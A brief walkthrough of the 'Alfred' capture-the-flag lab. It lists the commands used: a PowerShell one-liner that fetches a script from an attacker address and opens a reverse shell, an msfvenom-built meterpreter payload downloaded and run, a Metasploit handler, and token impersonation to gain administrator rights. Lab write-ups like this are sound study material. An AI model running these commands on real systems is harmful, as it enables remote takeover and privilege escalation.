...Alfred Walkthrough...
Commands used:
powershell iex (New-Object Net.WebClient).DownloadString('hxxp://10.11.3.40:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.3.40 -Port 4444
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.3.40 LPORT=4445 -f exe -o malicious.exe
powershell "(New-Object System.Net.WebClient).Downloadfile('hxxp://10.11.3.40:80/malicious.exe','malicious.exe')"
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.3.40
set LPORT 4445
run
Start-Process "malicious.exe"
whoami /priv
use incognito
list_tokens -g
impersonate_token "BUILTIN\Administrators"
ps
migrate to services.msc
search -f root
shell
type c:\Windows\System32\config\root.txt
Thanks for reading / watching!